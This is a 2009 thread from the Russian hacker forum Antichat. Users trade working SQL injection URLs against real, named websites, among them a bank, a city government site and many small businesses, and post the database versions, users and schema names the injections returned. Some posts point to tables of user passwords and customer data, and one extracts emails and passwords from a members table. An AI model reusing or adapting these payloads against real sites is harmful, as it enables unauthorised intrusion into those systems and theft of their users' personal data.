ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #9881  
Старый 15.06.2009, 12:41
Аватар для AlexSatter
AlexSatter
Постоянный
Регистрация: 29.01.2009
Сообщений: 333
Провел на форуме:
1168802

Репутация: 298
По умолчанию

http://www.tamm-kreiz.com/kalon/tk.php?action=fest&id=20884+and+substring(version( ),1,1)=5
 
Ответить с цитированием

  #9882  
Старый 15.06.2009, 12:56
Аватар для erihtoney
erihtoney
Познающий
Регистрация: 03.03.2009
Сообщений: 86
Провел на форуме:
994199

Репутация: 258
Отправить сообщение для erihtoney с помощью ICQ
По умолчанию

Цитата:
http://www.fidelitybank.com.gh/news/details.php?id=-1+union+select+all+1,concat_ws(0x3a,version(),user (),database()),3,4,5,6,7,8,9--
4.1.22-standard-log
335104_alfred@172.16.10.133
335104_fidelitycms
 
Ответить с цитированием

  #9883  
Старый 15.06.2009, 13:04
Аватар для AlexSatter
AlexSatter
Постоянный
Регистрация: 29.01.2009
Сообщений: 333
Провел на форуме:
1168802

Репутация: 298
По умолчанию

http://edmazur.com/bots/bot.php?s=green&id=149754+and+substring(version(), 1,1)=5/*
---
http://www.parkweddings.com/park.php?id=1+and+substring(version(),1,1)=4
---
http://www.sitebuildgroup.com/park.php?ID=-5+union+select+1,2,concat_ws(0x3a,version(),user() ,database()),4
4.0.27-max-log:sitesf@208.109.78.136:sitesf
---
http://www.parkbrochures.com/park.php?id=-73+union+select+concat_ws(0x3a,version(),user(),da tabase()),2,3,4
5.0.67-logarkbrochures@minutemaid.dreamhost.comarkbro chures
---
http://skateparkreview.com/park.php?id=-6+union+select+1,2,concat_ws(0x3a,version(),user() ,database()),4,5,6,7,8,9,10,11,12,13,14,15,16,17,1 8,19,20
4.0.27-max-log:spradmin@208.109.78.141:spradmin

есть таблица users
с полями usernames, password
---
http://www.credonic.com/park.php?a=d&id=-17171+union+select+1,2,concat_ws(0x3a,version(),us er(),database()),4,5,6,7,8,9,10,11
5.0.77-COMMUNITY:CREDOMAX_CREDO@LOCALHOST:CREDOMAX_CREDON IC
есть базы: credomax_10000, credomax_2000, credomax_4000, credomax_6000, credomax_8000,
В каждой из них есть табличка: dsp_buyers , из названия понятно что там хранятся покупатели. пароли, почты, имена и так далее, там.
---
http://cityofbartlesville.com/parkcalendar-park.php?cat=1049&event=-1014+union+select+1,2,concat_ws(0x3a,version(),use r(),database()),4,5,6,7,8,9,10,11,12,13,14,15,16,1 7,18,19,20/*
4.0.27-max-logendergraphics@68.178.254.114ende
---
http://www.nekropolia.pl/park.php?akcja=storyread&id=-71+union+select+1,concat_ws(0x3a,version(),user(), database()),3,4
5.0.75-log:imperio_5@77.55.40.135:imperio_5
таблица user со всеми вытекающими

Последний раз редактировалось AlexSatter; 15.06.2009 в 14:18..
 
Ответить с цитированием

  #9884  
Старый 15.06.2009, 14:08
Аватар для $n@ke
$n@ke
Постоянный
Регистрация: 18.09.2006
Сообщений: 867
Провел на форуме:
2805813

Репутация: 1396


По умолчанию

Цитата:
http://www.ausit.org/eng/showpage.php3?id=650+union+select+concat_ws(0x0a,i d,email,password),2,3+from+members+limit+2,1/*
таблицу к админке не подобрал((
Если получиться - пишите в лс.
 
Ответить с цитированием

  #9885  
Старый 15.06.2009, 14:17
Аватар для AlexSatter
AlexSatter
Постоянный
Регистрация: 29.01.2009
Сообщений: 333
Провел на форуме:
1168802

Репутация: 298
По умолчанию

http://www.moltravel.nl/park.php?id=22+and+substring(version(),1,1)=5
 
Ответить с цитированием

  #9886  
Старый 15.06.2009, 14:18
Аватар для Gorev
Gorev
Познавший АНТИЧАТ
Регистрация: 31.03.2006
Сообщений: 1,167
Провел на форуме:
4072944

Репутация: 1550


Отправить сообщение для Gorev с помощью ICQ Отправить сообщение для Gorev с помощью Yahoo
По умолчанию

http://www.windoor.ro/index.php?page=article&id=-31+union+select+1,concat_ws(0x3a,version(),databas e(),user(),@@version_compile_os),3

Version : 4.0.24-log
Database : windoor
User : windoor@localhost
Os : pc-linux-gnu
 
Ответить с цитированием

  #9887  
Старый 15.06.2009, 14:25
Аватар для AlexSatter
AlexSatter
Постоянный
Регистрация: 29.01.2009
Сообщений: 333
Провел на форуме:
1168802

Репутация: 298
По умолчанию

http://www.aiaccessory.com/part.php?id=-11226+union+select+1,2,concat_ws(0x3a,version(),us er(),database()),4,5,6,7
4.0.13:MYSQL0256@webhost1.ch.as12513.net:MYSQL0256
---
http://www.gk-linkor.ru/part.php?id=-54+union+select+1,2,3,concat_ws(0x3a,version(),use r(),database()),5,6
4.1.22-log:gk-linkor_mysql@10.1.22.207:gk_linkor_db
---
http://rusnauka2009.org/part.php?id=-3+union+select+1,concat_ws(0x3a,version(),user(),d atabase()),3,4,5,6,7,8,9,10
4.1.22-standard:rusnauk_rusnauk@localhost:rusnauk_biz

Последний раз редактировалось AlexSatter; 15.06.2009 в 14:32..
 
Ответить с цитированием

  #9888  
Старый 15.06.2009, 14:40
Аватар для $n@ke
$n@ke
Постоянный
Регистрация: 18.09.2006
Сообщений: 867
Провел на форуме:
2805813

Репутация: 1396


По умолчанию

Цитата:
http://google.indicateur.biz/index.php3?cat_id=107'+and+substring(version(),1,1 )=4/*
типа гугль))

юзер: indicateur@imu96.infomaniak.ch
 
Ответить с цитированием

  #9889  
Старый 15.06.2009, 14:44
Аватар для mailbrush
mailbrush
Познавший АНТИЧАТ
Регистрация: 24.06.2008
Сообщений: 1,996
Провел на форуме:
6075534

Репутация: 2731


Отправить сообщение для mailbrush с помощью ICQ
По умолчанию

Код:
http://www.iitis.gliwice.pl/en/laboratory.php?ID=-1)+union+select+1,2,concat_ws(0x3a,user(),database(),version()),4/*
Код:
webmaster@localhost:iitis:4.1.11
 
Ответить с цитированием

  #9890  
Старый 15.06.2009, 14:52
Аватар для AlexSatter
AlexSatter
Постоянный
Регистрация: 29.01.2009
Сообщений: 333
Провел на форуме:
1168802

Репутация: 298
По умолчанию

Код:
http://www.tricountyauto.com/part.php?ID=-18+union+select+1,2,3,concat_ws(0x3a,version(),user(),database()),5,6
4.0.24-standard:tricount_web@localhost:tricount_db

Код:
http://iswebsite.com/part.php?vArticleID=-357+union+select+concat_ws(0x3a,version(),user(),database()),2,3,4,5
4.1.22-standard:iswebsit_admin@localhost:iswebsit_article

Код:
http://www.claudinepisko.be/fr/code/part.php?id=7+and+substring(version(),1,1)=5
Код:
http://www.sortecs.ru/comp.php?id=33&idsub=94+union+select+1,2,3,4,5,concat_ws(0x3a,version(),user(),database()),7,8,9,10,11,12,13,14,15,16/*
4.1.22-log:sortecs2_sortecs@localhost:sortecs2_new

Код:
http://www.sctrade.ru/news.php?a=39+union+select+1,2,3,concat_ws(0x3a,version(),user(),database()),5,6/*
4.1.22-standard-log:sctrade_admin@web03.nthost.ru:sctrade_main

Код:
http://www.osacorp.ru/content.php?id=27&idsub=-49+union+select+1,2,concat_ws(0x3a,version(),user(),database()),4,5,6,7,8,9,10,11,12,13
5.1.29-rc-logsacorp@localhostsacorp_main

Код:
http://www.msn-media.ru/docs_view.php?ss=-10+union+select+1,2,concat_ws(0x3a,version(),user(),database()),4,5,6
5.0.67-log:msnmedi_admn@web0103.nthost.ru:msnmedi_msn
Код:
http://www.m-furnitura.ru/comp.php?id=-8+union+select+1,2,3,concat_ws(0x3a,version(),user(),database()),5,6,7,8,9,10,11,12
5.0.67:m-furnitura@localhost:m-furnitura
На сайте есть форум, phpbb, Достать акки оттуда проблем не составит
правда форум пустой

эти сайты, некой Дизайн-студии Patix. Пробежался быстренько по портфолио, все сайты уязвимы.
patix.ru

Последний раз редактировалось AlexSatter; 15.06.2009 в 16:08..
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Обнаружение Sql инъекций в Oracle, часть вторая k00p3r Чужие Статьи 0 13.06.2005 11:26
SQL инъекция и Oracle, часть 2 k00p3r Чужие Статьи 0 13.06.2005 11:24
Sql инъекция и Oracle, часть первая k00p3r Чужие Статьи 0 13.06.2005 11:23
Внедрение Sql кода с завязанными глазами k00p3r Чужие Статьи 0 12.06.2005 20:48
SQL Injection в Oracle k00p3r Чужие Статьи 0 12.06.2005 12:41



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ